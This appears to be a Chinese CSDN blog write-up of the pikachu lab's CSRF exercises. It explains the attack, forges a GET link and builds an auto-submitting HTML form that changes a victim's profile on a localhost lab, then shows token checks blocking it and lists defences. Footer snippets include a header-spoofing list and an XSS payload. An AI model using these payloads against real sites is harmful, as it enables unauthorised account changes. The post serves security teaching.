【web-ctf】ctf-pikachu-CSRF

已于 2023-05-24 08:42:07 修改
阅读量1k 收藏 4
点赞数 1
分类专栏: ctf 文章标签: csrf 安全 web安全
于 2022-06-29 11:25:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dajian1040556534/article/details/125515029
版权

文章目录

CSRF(跨站请求伪造,cross-site request forgery)

原理:攻击者伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户点击,用户一旦点击了这个请求,整个攻击就完成了。所以也称之为“one-click”攻击。

攻击成功前提:

1. 网站没有对某些请求做防CSRF攻击处理,导致该请求易被伪造。
2. 用户在登陆后台的情况下,点击了伪造的链接

CSRF与XSS区别:

XSS:直接使用目标用户的权限进行攻击(比如盗取cookie,然后直接顺利登录目标用户后台进行修改信息)。
CSRF:借用目标用户的权限进行攻击(比如伪造链接,但需要目标用户点击才能进行修改信息)。

总结:XSS一般可以拿到用户权限;CSRF没有拿到用户权限。一般而言这两个攻击没有太大关联性,但易混淆。

如何确定存在CSRF漏洞:

1. 对目标网站增删改的地方进行标记,并观察其逻辑,判断请求是否可以被伪造。
--比如修改管理员账号时,并不需要验证旧密码,导致请求容易被伪造。
--比如对于敏感信息的修改并没有使用安全的token验证,导致请求容易被伪造。

2. 确认凭证的有效期(这个问题会提高CSRF被利用的概率)
--虽然退出或者关闭了浏览器,但cookie仍然有效,或者session并没有及时过期,导致CSRF攻击变得简单

1.CSRF(get)

攻击者:allen
受害者:lucy

  1. 为了修改lucy的个人信息,allen首先需要在网站上注册一个账号。
    –pikachu平台上已经有了几个账号,我们直接登录allen的后台即可。
    在这里插入图片描述

  2. 登录allen后台后,点击修改个人信息,将住址改为shanxi,点击submit。(注意点击的时候需要打开burpsuite)
    在这里插入图片描述

  3. 此时打开burpsuite进行抓包,打开Proxy模块的HTTP history,发现刚才进行修改的数据包已经被抓到。
    在这里插入图片描述

  4. 我们将该数据包复制下来,发现该数据包中并没有存在token等字段,因此我们判断该网页并没有使用安全的token验证,因此存在CSRF漏洞。

    将数据包伪造完整:

     http://127.0.0.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=13676767767&add=shanxi&email=allen%40pikachu.com&submit=submit

  5. 将这个数据包发送给已经登录后台的lucy,诱使其点击。
    在这里插入图片描述
    在这里插入图片描述

  6. 发现lucy的个人信息已经完全修改为allen指定的信息了。
    在这里插入图片描述

2.CSRF(post)

需要自己构造一个站点,然后在网页中设计一个表单,再诱使lucy点击。

攻击者:allen
受害者:lucy

  1. 构造恶意网页attack.html
<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="123456789" />
    <input id="add" type="text" name="add" value="hubei" />
    <input id="email" type="text" name="email" value="lucy@163.com" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
————————————————
版权声明:本文为CSDN博主「witwitwiter」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/witwitwiter/article/details/115835156

  1. 将恶意网页发给登录态的lucy,并诱使其点击。

     http://127.0.0.1/pikachu-master/vul/csrf/csrfpost/attack.html

  2. 攻击成功
    在这里插入图片描述

3.CSRF(token)

token是如何防止CSRF的:因为CSRF的主要问题在于敏感操作的链接容易被伪造,而token会使得链接不易被伪造。

具体方法:

每次请求,都增加一个随机码(需要足够随机,不易被伪造),后台每次对这个随机码进行验证。该随机码称为token。因为该随机码不易被构造出来,因此请求也就不易被伪造了。

攻击者:allen
受害者:lucy

  1. 登录攻击者后台,修改信息,抓包并伪造。
    在这里插入图片描述
    在这里插入图片描述

  2. 发现url中含token,我们还按照之前的方法构造恶意url。并诱使登录态的lucy点击。

     http://127.0.0.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php?sex=boy&phonenum=13676767767&add=hunan&email=allen%40pikachu.com&token=8736162bbc554bfcf4687190416&submit=submit

  3. 发现攻击失败,得到的错误信息为token值不相等。
    在这里插入图片描述

总结

CSRF漏洞的根本原因在于:请求容易被伪造。

防范措施:

1. 增加token验证(常用的做法):对关键操作增加token参数,token值必须随机,每次都不一样
2. 关于安全的会话管理(避免会话被利用):
(1)不要在客户端保存敏感信息(比如身份认证信息)
(2)测试直接关闭,退出时,会话的过期机制
(3)设置会话过期机制,比如15分钟内误操作,则自动登录超时。
3. 访问控制安全管理:
(1)敏感信息的修改时需要对身份进行二次认证,比如修改账号时,需要判断旧密码。
(2)敏感信息的修改用post,而不是get
(3)通过http头部中的referer来限制原页面
4. 增加验证码:一般用在登录(防暴力破解),也可以用在其他重要信息操作的表单中(需要考虑可用性)
过动猿
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
83.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结_杨秀璋的专栏-CSDN博客1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
ctf练习7
qq_61109509的博客
04-04 4202
命令执行 web56 无字母数字RCE 这里是无字母数字的命令执行,先构造一个文件上传 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width
CTF IP伪造http请求头
最新发布
qq_50351194的博客
05-19 212
X-Forwarded-For: 127.0.0.1 X-Forwarded: 127.0.0.1 Forwarded-For: 127.0.0.1 Forwarded: 127.0.0.1 X-Requested-With: 127.0.0.1 X-Forwarded-Proto: 127.0.0.1 X-Forwarded-Host: 127.0.0.1 X-remote-IP: 127.0.0.1 X-remote-addr: 127.0.0.1 True-Client-IP: 127.0.0.1 X
CTF-web Xman-2018 第五天 xss csrf
iamsongyu的博客
12-15 1388
xss常见套路 对于xss,实际上就是把我们提交上去的数据当做代码执行,对于这种实际上有很多种情况可以攻击,下面具体介绍一些常用的套路。 先看一些小trik 很多HTML标记中的属性都支持javascript:[code]伪协议的形式. &lt;table background="javascript:alert(/xss/)"&gt;&lt;/table&gt; &lt;img src=...
CTF比赛必备常用工具(附下载方式)
热门推荐
Python_0011的博客
06-27 1万+
在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。主要包括六大类:PWN、CRYPTO(解密)、REVERSE(逆向)、WEB、MISC(杂项)其中,REVERSE(逆向)和MISC(杂项),在比赛中要使用大量的辅助工具,才能快速解题。本文章也主要聚焦这两类赛题的工具。
CTF基础(学习笔记)
qq_63785498的博客
03-08 620
CFT-DVWA-low笔记
超微X11SPW-CTF主板用户手册
04-01
超微X11SPW-CTF主板用户手册
web-ctf-help:脚本集,以帮助基于Webctfs
02-24
Web-CTF-帮助描述一组简单的脚本(目前主要为抓取器),旨在帮助Web CTF。 查找图像源(和替代项),JavaScript源和注释。用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies...
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
My-CTF-Challenges
05-16
【标题】"我的CTF挑战"是一个集合,包含了一系列网络安全竞赛中的挑战,旨在提升参赛者在信息安全领域的技能和知识。这个挑战集可能是为一个名为"周大福"的活动或组织设计的。其中的一个具体挑战是"TCTF2018_决赛",...
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
ctf从入门到放弃:token 与 csrf 的防范190514
爱党人士
05-15 1979
Token是如何防止CSRF的? CSRF的主要问题是敏感操作的链接容易被伪造,那么如何让这个链接不容易被伪造? -每次请求,都增加一个随机码(需要够随机,不容易伪造),后台每次对这个随机码进行验证! 用bp抓包,post型的: CSRF(token)项目的token生成代码: 有两点注意: 1.要生成新的 2.销毁旧的 最后,在后台有个这样的判断: $_GET[]= $_SESSION[] ...
CSRF漏洞原理攻击与防御(非常细)
Karka_的博客
06-07 1536
CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。
CSRF漏洞原理,通过csrf进行地址修改实验演示,token详解及常见防范措施
weixin_43858799的博客
05-08 1266
CSRF漏洞原理,通过csrf进行地址修改实验演示,token详解及常见防范措施 一、CSRF漏洞原理 Cross-site request forgery 简称为"CSRF" 在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接) 然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了 所以CSRF攻击也被称为为“one click”攻击 eg: 如果想要修改luc...
CSRF与钓鱼链接攻击
球球的博客
03-20 5616
CSRF发生的原理和过程,验证Referer这种不靠谱的防御即绕过
CSRF漏洞详解与挖掘
Candour_0的博客
02-27 241
CSRF漏洞详解与挖掘
必读篇!CSRF攻击原理与解决方法
Galaxy_0的博客
11-25 1218
CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。CSRF具体表现为攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账…造成的问题包括:个人隐私泄露以及财产安全
网络安全漏洞——CSRF漏洞
A906003660的博客
07-29 136
● 获取目标用户发出去的数据包● 利用工具生成一个网页(伪造的l● 诱导用户访问我们伪造的网页。
CTF网络安全大赛介绍
Innocence_0的博客
07-15 1997
CTF竞赛模式分为以下三类:一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。
Ubuntu-CTF
07-28
CTFd是一个用于举办和参加CTF(Capture The Flag)安全竞赛的平台。根据引用\[1\]和引用\[2\]的内容,你可以按照以下步骤在Ubuntu上搭建CTFd平台: 1. 首先,确保你已经安装了虚拟机并配置好了Ubuntu系统。具体的安装和配置步骤可以参考相关的教程。 2. 配置阿里云镜像下载源文件。这可以加快软件包的下载速度。你可以按照引用\[1\]中的指导进行配置。 3. 进入CTFd目录。在终端中使用cd命令进入CTFd的目录。 4. 使用gunicorn工具配置CTFd。根据引用\[2\]和引用\[3\]的内容,你可以使用以下命令配置gunicorn工具: ``` gunicorn --bind 0.0.0.0:8000 -w 5 "CTFd:create_app()" ``` 5. 如果你希望在重启电脑后再次运行CTFd平台,确保以root权限运行。在Ubuntu终端中使用sudo命令运行上述命令。 这样,你就可以在Ubuntu上成功搭建CTFd平台了。请注意,这只是一个简单的搭建过程,具体的配置和使用方法可能会有所不同,你可以参考相关的文档和教程进行更详细的了解和操作。 #### 引用[.reference_title] - *1* *2* *3* [基于Ubuntu搭建CTFd平台(全网最全)](https://blog.csdn.net/qq_25953411/article/details/127489944)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值